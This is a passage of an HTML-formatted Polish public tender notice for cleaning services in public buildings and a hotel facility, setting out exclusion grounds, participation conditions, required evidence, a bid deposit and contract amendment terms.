class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez<br/>Zamawiającego warunki udziału w postępowaniu.<br/>2. W zakresie zdolności technicznej i zawodowej:<br/>1) W zakresie doświadczenia<br/>• Dla części 1:<br/>zrealizował lub realizuje (przy czym w tym przypadku będzie uwzględniana wartość zrealizowanej części przedmiotu<br/>umowy), na podstawie jednej umowy, usługi z zakresu sprzątania w budynkach użyteczności publicznej o łącznej wartości<br/>nie mniejszej niż<br/>70 000,00 zł brutto polegające na wykonywaniu prac odpowiadających przedmiotowi niniejszego zamówienia, przy czym:<br/>a) w przypadku Wykonawców wspólnie ubiegających się udzielenie zamówienia, co najmniej jeden z takich Wykonawców<br/>powinien wykazać usługi z zakresu sprzątania o wartości stanowiącej co najmniej 50% łącznej wartości usług wymaganej w<br/>treści niniejszego warunku,<br/>b) w przypadku polegania na doświadczeniu podmiotów udostępniających zasoby, co najmniej jeden z takich podmiotów lub<br/>Wykonawca (a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - co najmniej jeden z takich<br/>Wykonawców) powinien wykazać usługi z zakresu sprzątania o wartości stanowiącej co najmniej 50% łącznej wartości usług<br/>wymaganej w treści niniejszego warunku;<br/>Pod pojęciem budynku użyteczności publicznej należy rozumieć budynek przeznaczony na potrzeby administracji<br/>publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki<br/>zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub<br/>telekomunikacyjnych, turystyki, sportu oraz inny budynek przeznaczony do wykonywania podobnych funkcji; za budynek<br/>użyteczności publicznej uznaje się także budynek biurowy lub socjalny, jeśli jest on dostępny dla niedającej się określić z<br/>góry grupy osób (interesantów).<br/>• Dla części 2<br/>zrealizował lub realizuje (przy czym w tym przypadku będzie uwzględniana wartość zrealizowanej części przedmiotu<br/>umowy), na podstawie jednej umowy, usługi z zakresu sprzątania obiektów hotelarskich posiadających nie mniej niż 50<br/>miejsc noclegowych (m.in. hotel, motel, pensjonat), o łącznej wartości nie mniejszej niż 200 000,00 zł brutto polegające na<br/>wykonywaniu prac odpowiadających przedmiotowi niniejszego zmówienia przy czym:<br/>a) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, co najmniej jeden z takich Wykonawców<br/>powinien wykazać usługi z zakresu sprzątania o wartości stanowiącej co najmniej 50% łącznej wartości usług wymaganej w<br/>treści niniejszego warunku,<br/>b) w przypadku polegania na doświadczeniu podmiotów udostępniających zasoby, co najmniej jeden z takich Podmiotów lub<br/>Wykonawca (a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - co najmniej jeden z takich<br/>Wykonawców) powinien wykazać usługi z zakresu sprzątania o wartości stanowiącej co najmniej 50% łącznej wartości usług<br/>wymaganej w treści niniejszego warunku;<br/>2) W zakresie osób skierowanych do realizacji zamówienia<br/>Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponował następującymi osobami, które skieruje do<br/>realizacji zamówienia:<br/>• Dla części 1: min. 1 osobowym zespołem roboczym<br/>• Dla części 2: min. 3 osobowym zespołem roboczym<br/><br/>3) W zakresie dysponowania potencjałem technicznym<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować urządzeniami<br/>technicznymi, niezbędnymi do prawidłowej realizacji zamówienia tj:<br/> Dla części 1:<br/>- min. 1 odkurzacz o obniżonym poziomie hałasu nie wyższym niż: 63dB<br/>- min. 1 urządzenie do prania wykładzin przystosowane do usuwania plam z obić tapicerskich<br/> Dla części 2:<br/>- min. 3 odkurzacze o obniżonym poziomie hałasu nie wyższym niż: 63dB<br/>- min. 1 urządzenie do profesjonalnego ekstrakcyjnego prania wykładzin przystosowane do usuwania plam z obić<br/>tapicerskich,<br/>- min. 1 profesjonalna myjka parowa,<br/>- min. 1 odśnieżarka<br/><br/>3. Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że<br/>Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze<br/>Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>4. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji<br/>których te zdolności są wymagane.<br/>5. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w<br/>odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych<br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te<br/>zdolności są wymagane.<br/>7. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, musi udowodnić Zamawiającemu, że<br/>realizując zamówienie, faktycznie będzie dysponował zasobami tych podmiotów, w szczególności przedstawiając ich<br/>zobowiązanie do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/>8. Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub<br/>zawodowe pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu dotyczących zdolności<br/>technicznych lub zawodowych, a także zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały<br/>przewidziane względem Wykonawcy.<br/>9. Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie potwierdzają spełniania przez<br/>Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający<br/>żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami<br/>albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu. Wykonawca nie może, po upływie terminu<br/>składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania<br/>ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>10. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/„nie spełnia”, w<br/>oparciu o informacje zawarte w dokumentach lub oświadczeniach złożonych przez Wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty każdy Wykonawca<br/>musi dołączyć „Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu”, w zakresie wskazanym<br/>przez Zamawiającego odpowiednio w rozdziale 6 ust. 1 i ust. 2 oraz w rozdziale 5 ust. 2 pkt 1), pkt 2) i pkt 3) SWZ. Oświadczenie to<br/>stanowić będzie dowód, potwierdzający brak podstaw wykluczenia lub spełnianie warunków udziału w postępowaniu na dzień<br/>składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe (wzór oświadczenia<br/>stanowi załącznik nr 4 do SWZ).<br/>oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>(wzór oświadczenia stanowi załącznik nr 7 do SWZ);<br/>b) oświadczenia wykonawcy o aktualności informacji zawartych w Oświadczeniu o niepodleganiu wykluczeniu i spełnianiu warunków<br/>udziału w postępowaniu, w zakresie podstaw wykluczenia z postępowania, o których mowa w:<br/>i) art. 108 ust. 1 pkt 1 i 2 ustawy,<br/>ii) art. 108 ust. 1 pkt 3 ustawy,<br/>iii) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>iv) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,<br/>v) art. 108 ust. 1 pkt 6 ustawy,<br/>vi) art. 109 ust. 1 pkt 1 ustawy, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których<br/>mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2023 r. poz. 70 z późn. zm),<br/>vii) art. 109 ust. 1 pkt 4-5,7–10 ustawy.<br/>viii) art. 7 ust. 1 pkt 1- pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2025 r., poz. 514)<br/>(wzór oświadczenia stanowi załącznik nr 7 do SWZ).<br/>Podmiotowe środki dowodowe dotyczące podmiotów innych niż Wykonawca - zostały szczegółowo opisane w rozdziale 7 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do<br/>oferty każdy Wykonawca musi dołączyć „Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w<br/>postępowaniu”, w zakresie wskazanym przez Zamawiającego odpowiednio w rozdziale 6 ust. 1 i ust. 2 oraz w rozdziale 5 ust. 2 pkt<br/>1), pkt 2) i pkt 3) SWZ. Oświadczenie to stanowić będzie dowód, potwierdzający brak podstaw wykluczenia lub spełnianie warunków<br/>udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe (wzór oświadczenia stanowi załącznik nr 4 do SWZ).<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub<br/>zawodowej, Zamawiający żąda:<br/>a) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi<br/>zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;- w zakresie niezbędnym do<br/>wykazania spełniania warunku udziału w postępowaniu, określonego w rozdz. 5 ust. 2. pkt 1) niniejszego SWZ (wzór wykazu<br/>stanowi załącznik nr 9 do SWZ);<br/>Uwaga:<br/>Dla części 2 referencje muszą potwierdzać, że Wykonawca zrealizował lub realizuje (przy czym w tym przypadku będzie<br/>uwzględniana wartość realizowanej części przedmiotu umowy), na podstawie jednej umowy, usługi z zakresu sprzątania obiektów<br/>hotelarskich posiadających nie mniej niż 50 miejsc noclegowych<br/>b) Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami<br/>- w zakresie niezbędnym do wykazania spełniania warunku udziału w postępowaniu, określonego w rozdz. 5 ust. 2. pkt 2)<br/>niniejszego SWZ (wzór wykazu stanowi załącznik nr 5 do SWZ);<br/>c) Wykazu urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o<br/>podstawie do dysponowania tymi zasobami - w zakresie niezbędnym do wykazania spełniania warunku udziału w postępowaniu,<br/>określonego w rozdz. 5 ust. 2. pkt 3) niniejszego SWZ (wzór wykazu urządzeń technicznych dostępnych Wykonawcy w celu<br/>wykonania zamówienia stanowi Załącznik nr 8 do SWZ);<br/>Podmiotowe środki dowodowe dotyczące podmiotów innych niż Wykonawca - zostały szczegółowo opisane w rozdziale 7 SWZ.<br/>INFORMACJE O PODMIOTOWYCH ŚRODKACH DOWODOWYCH I INNYCH DOKUMENTACH I OŚWIADCZENIACH zostały<br/>szczegółowo opisane w rozdziale 7 SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi być sporządzona zgodnie z treścią formularza „Oferta Wykonawcy” (wzór formularza oferty stanowi załącznik nr<br/>2 do SWZ).<br/>Wraz z ofertą musi zostać złożone Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w<br/>postępowaniu (wzór oświadczenia stanowi załącznik nr 4 do SWZ).<br/>Do oferty należy załączyć, jeżeli dotyczy:<br/>1) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, które usługi wykonają poszczególni<br/>Wykonawcy. Wzór stosownego oświadczenia został zawarty w Formularzu Oferty (stanowiącym Załącznik nr 2 do SWZ) i<br/>Zamawiający zaleca złożyć to oświadczenie właśnie w tym Formularzu. Obowiązek złożenia oświadczenia, o którym mowa<br/>w art. 117 ust. 4 PZP odnosi się również do Wykonawców, prowadzących działalność w formie spółki cywilnej.<br/>2) Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w rozdziale 7 ust. 2 pkt 2) niniejszego SWZ,<br/>potwierdzające oddanie Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (wzór<br/>zobowiązania stanowi załącznik nr 6 do SWZ),<br/>3) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru – w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania,<br/>4) pełnomocnictwo do występowania w imieniu Wykonawcy,<br/>5) pełnomocnictwo do reprezentowania w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>Inne dokumenty i oświadczenia składane wraz z ofertą.<br/>1) W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Wykonawcy<br/>ma obowiązek złożyć odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru.<br/>Wykonawca nie jest zobowiązany do złożenia powyższych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>2) Jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotu<br/>udostępniającego zasoby lub podwykonawcy niebędącego podmiotem udostępniającym zasoby, działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika z powyższych dokumentów, należy złożyć pełnomocnictwo lub inny<br/>dokument potwierdzający umocowanie do reprezentowania Wykonawcy, Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby lub podwykonawcy niebędącego podmiotem<br/>udostępniającym zasoby.<br/>Pełnomocnictwo powinno być złożone w oryginale lub w postaci cyfrowego odwzorowania dokumentu sporządzonego w<br/>postaci papierowej (elektronicznej kopii), poświadczonej za zgodność z oryginałem przez mocodawcę albo notarialnie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości określonej poniżej:<br/>dla Części I w wysokości 2000,00 zł<br/>dla Części II w wysokości 4000,00 zł<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać<br/>nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków,<br/>o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>2. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku<br/>następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>24<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2<br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (tekst jedn.: Dz. U. z 2025 r. poz. 98).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w banku BGŻ nr rachunku: 16 1600 1462 1016 7866 5000 0003 z<br/>dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na „Kompleksowa usługa<br/>sprzątania Część ….” Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli<br/>w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego.<br/>Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej<br/>lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2<br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie<br/>zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do<br/>wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98<br/>ust. 6 PZP.<br/>5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt<br/>2)-4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci<br/>elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi osób<br/>upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę na daną część<br/>zamówienia przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie<br/>wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w<br/>przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z<br/>postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/><br/>6. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Zamawiający wymaga, aby w treści wadium wnoszonego w formach, o których mowa w<br/>pkt 2. ppkt 2)-4) SWZ zostali wymienieni wszyscy Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia albo powinno z niej wynikać, że Wykonawca, na którego<br/>gwarancja/poręczenie zostały wystawione działa w imieniu innych Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, bądź w ich treści powinien zostać<br/>ujęty szerszy zakres odpowiedzialności gwaranta/poręczyciela niż tylko dotyczący<br/>działań/zaniechań odnoszących się do Wykonawcy, na którego gwarancja/poręczenie to<br/>zostało wystawione (zob. wyrok Krajowej Izby Odwoławczej z dnia 24 czerwca 2020 r.<br/>sygn. akt KIO 662/20; wyrok Krajowej Izby Odwoławczej z dnia 15 czerwca 2020 r.,<br/>sygn. akt KIO 970/20; wyrok Krajowej Izby Odwoławczej z dnia 31 lipca 2020 r., sygn.<br/>akt KIO 1183/20, uchwała Krajowej Izby Odwoławczej z dnia 11 marca 2021 r., sygn. akt<br/>KIO/KD 6/21).<br/>7. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, „Oświadczenie o niepodleganiu wykluczeniu i<br/>spełnianiu warunków udziału w postępowaniu”, o którym mowa w pkt 1), musi złożyć każdy z Wykonawców. Oświadczenia<br/>te mają potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz<br/>z oświadczeniem o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, także „Oświadczenie o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu” podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim Wykonawca powołuje się na jego zasoby.<br/>2. Podmiotowe środki dowodowe składane wraz z ofertą – jeżeli dotyczy.<br/>1) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty „Oświadczenie, które<br/>usługi wykonają poszczególni Wykonawcy” – jeżeli w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia polegają na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których<br/>te zdolności są wymagane. Wzór stosownego oświadczenia został zawarty w Formularzu Oferty (stanowiącym Załącznik nr<br/>2 do SWZ) i Zamawiający zaleca złożyć to oświadczenie właśnie w tym Formularzu. Obowiązek złożenia oświadczenia, o<br/>którym mowa w art. 117 ust. 4 PZP odnosi się również do Wykonawców, prowadzących działalność w formie spółki<br/>cywilnej.<br/>2) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, ma obowiązek złożyć wraz z<br/>ofertą, „Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia” lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – jeżeli w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia polegają na zdolnościach podmiotów udostępniających zasoby,<br/>jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane (wzór zobowiązania<br/>stanowi załącznik nr 6 do SWZ).<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa wyżej, powinno potwierdzać, że stosunek łączący<br/>Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać w<br/>szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>Treść zobowiązania powinna bezspornie i jednoznacznie wskazywać na zakres zobowiązania innego podmiotu, określać,<br/>czego dotyczy zobowiązanie oraz w jaki sposób i w jakim okresie będzie ono wykonywane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający wymaga zawarcia umowy według wzoru, stanowiącego załącznik nr 3 do SWZ.<br/>Stronom poza przypadkami określonymi w przepisach kodeksu cywilnego, i określonymi w paragrafie 8 umowy, przysługuje<br/>prawo do odstąpienia od umowy:<br/>1. Zamawiającemu przysługuje prawo odstąpienia od umowy w terminie 30 dni od powzięcia wiadomości o wystąpieniu<br/>jednej z niżej wymienionych okoliczności:<br/>- Wykonawca nie rozpoczął realizacji zakresu usług w ciągu 24 godzin od dnia określonego w umowie jako dzień rozpoczęcia realizacji obowiązków umownych lub zaprzestał ich realizacji i przerwa trwa 24 godziny ,<br/>-Wykonawca wykonuje przedmiot umowy przy pomocy podwykonawców z naruszeniem postanowień § 7 umowy<br/>- zostanie ogłoszona upadłość lub likwidacja firmy Wykonawcy lub wykonawca zawiesi działalność gospodarczą.<br/>- zostanie wszczęte postepowanie egzekucyjne z majątku Wykonawcy<br/>2. Zamawiający może ponadto odstąpić od umowy ze skutkiem natychmiastowym, jeżeli Wykonawca:<br/>- nie stosuje technologii wykonania prac zgodnie ze złożoną ofertą,<br/>- nie przestrzega przepisów BHP,<br/>- nie przestrzega obowiązujących przepisów p.poż.<br/>- nie przestrzega zakazu spożywania alkoholu i znajdowania się pod wpływem alkoholu lub środków odurzających osób w<br/>miejscu świadczenia usług,<br/>- wykorzystuje mienie zamawiającego bez jego zgody lub niezgodnie z przeznaczeniem, wykonawca rażąco naruszył w inny<br/>sposób postanowienia niniejszej umowy.<br/>1. Wykonawcy przysługuje prawo odstąpienia od umowy, jeżeli Zamawiający nie wywiązuje się z obowiązku zapłaty faktur<br/>po upływie 30 dni po terminie zapłaty mimo wezwania złożonego na piśmie wystosowanego przez Wykonawcę<br/>2. Odstąpienie od umowy może nastąpić wyłącznie z zachowanie formy pisemnej z podaniem przyczyny i daty odstąpienia<br/>od umowy.<br/>3. W przypadkach określonych w ust.1 i 2 wykonawca może żądać jedynie wynagrodzenia zależnego mu z tytułu<br/>wykonywania czynności do czasu odstąpienia od umowy.<br/>§11<br/>1. Termin realizacji zamówieni wskazany § 6 może ulec skróceniu w przypadku:<br/>- przerwy w realizacji zamówienia z przyczyn niezależnych od zamawiającego,<br/>- siły wyższej. Za okoliczność siły wyższej uznaje się na okoliczność o charakterze zewnętrznym, mające nadzwyczajny<br/>charakter, niedające się przewidzieć, oraz którym nie można zapobiec. W szczególności są to zdarzenia o charakterze<br/>katastrof przyrodniczych itp. (powodzie, huragany, pożary) lub nadzwyczajne zaburzenia życia zbiorowego (stan wyjątkowy,<br/>ogłoszenie klęski żywiołowej).<br/>- okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy,<br/>- okolicznościami leżącymi po stronie Zamawiającego.<br/>2. Strony dopuszczają wprowadzenie zmian i uzupełnień postanowień zawartej umowy w stosunku do treści oferty na<br/>podstawie, której dokonano wyboru wykonawcy, w opisanym niżej zakresie:<br/><br/>zmiany powszechnie obowiązujących przepisów prawa a zakresie mającym wpływ na realizacje przedmiotu umowy,<br/><br/>zmiany osób wyznaczonych do kontaktów, Wykonawcy i Zamawiającego,<br/><br/>w zakresie zmiany stawki podatku VAT. W przypadku zmiany stawki podatku VAT, podatek w nowej wysokości<br/>obowiązującej w momencie powstania obowiązku podatkowego doliczony zostanie do ceny netto.<br/><br/>w przypadku zaistnienia przesłanek z art. 455 Ustawy Prawo zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 